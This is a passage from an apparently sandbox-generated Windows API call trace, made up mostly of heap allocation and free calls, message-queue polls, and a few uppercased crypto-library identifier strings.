hHeap=0x970000) returned 1 [0268.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a78 | out: hHeap=0x970000) returned 1 [0268.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543c8 | out: hHeap=0x970000) returned 1 [0268.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0268.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51940 | out: hHeap=0x970000) returned 1 [0268.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e544e0 | out: hHeap=0x970000) returned 1 [0268.765] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0268.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0268.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0268.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0268.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b88 | out: hHeap=0x970000) returned 1 [0268.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f153a0 | out: hHeap=0x970000) returned 1 [0268.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0268.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0268.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.766] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0268.766] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0268.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0268.766] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0268.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0268.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0268.766] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0268.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0268.767] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0268.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0268.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0268.767] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0268.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0268.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0268.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d98 [0268.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0268.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0268.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a78 [0268.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0268.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ea8 [0268.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0268.767] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0268.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b98 [0268.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0268.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0268.767] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0268.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0268.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51988 [0268.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0268.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0268.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0268.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0268.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51ad8 [0268.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b68 [0268.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0268.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0268.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0268.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0268.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bb0 | out: hHeap=0x970000) returned 1 [0268.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0268.768] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0268.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ad8 | out: hHeap=0x970000) returned 1 [0268.768] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b68 | out: hHeap=0x970000) returned 1 [0268.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0268.769] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0268.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0268.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0268.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ad8 [0268.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0268.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0268.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0268.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b68 [0268.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.769] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0268.769] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51928 | out: hHeap=0x970000) returned 1 [0268.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0268.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0268.769] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0268.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0268.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0268.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0268.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519d0 [0268.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0268.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.770] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0268.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0268.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51928 [0268.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0268.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0268.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0268.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.770] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.770] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.771] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b08 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d18 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51da8 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e80 [0268.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.771] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51e20 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d48 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ca0 [0268.771] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d00 [0268.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.771] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.772] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0268.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0268.772] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0268.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0268.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51958 [0268.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0268.772] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0268.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0268.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0268.772] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0268.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0268.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0268.772] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0268.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0268.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0268.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0268.772] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0268.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0268.772] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0268.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0268.773] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0268.773] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0268.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0268.773] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0268.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0268.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51a48 [0268.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0268.773] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0268.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0268.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.773] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0268.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a48 | out: hHeap=0x970000) returned 1 [0268.773] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0268.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0268.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0268.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.773] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.773] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0268.773] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0268.773] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0268.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9f0 [0268.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0268.774] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9f0 | out: hHeap=0x970000) returned 1 [0268.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0268.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51d30 [0268.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0268.774] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0268.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0268.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0268.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0268.774] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d30 [0268.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.774] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cd0 [0268.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51d60 [0268.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0268.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51cb8 [0268.775] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bf8 [0268.775] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0268.775] RtlAllocateHeap 